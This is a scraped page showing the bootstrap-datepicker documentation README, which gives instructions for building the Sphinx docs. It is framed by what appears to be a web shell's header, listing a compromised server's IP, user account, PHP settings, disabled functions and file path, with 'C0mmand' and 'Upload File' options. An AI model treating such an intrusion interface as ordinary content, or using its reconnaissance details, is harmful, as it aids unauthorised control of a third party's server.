Server IP : 103.191.208.50 / Your IP : 216.73.216.226 Web Server : LiteSpeed System : Linux orion.herosite.pro 4.18.0-553.53.1.lve.el8.x86_64 #1 SMP Wed May 28 17:01:02 UTC 2025 x86_64 User : celkcksm ( 1031) PHP Version : 5.6.40 Disable Function : show_source, system, shell_exec, passthru, exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/celkcksm/bmtrust.org.in/admin/images/../bower_components/bootstrap-datepicker/docs/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
Documentation ============= Project documentation is built using [Sphinx docs](http://sphinx-doc.org/), which uses [ReST](http://docutils.sourceforge.net/rst.html) for markup. This allows the docs to cover a vast amount of topics without using a thousand-line README file. Sphinx docs is pip-installable via `pip install sphinx`. Once installed, open a command line in the docs folder and run the following commands: ```bash $ sudo pip install -r requirements.txt ``` This will install the requirements needed for the generating the docs. Afterwards you can run: ```bash $ make html ``` The docs will be generated, the output files will be placed in the `_build/html/` directory, and can be browsed (locally) with any browser. The docs can also be found online at <https://bootstrap-datepicker.readthedocs.org/>.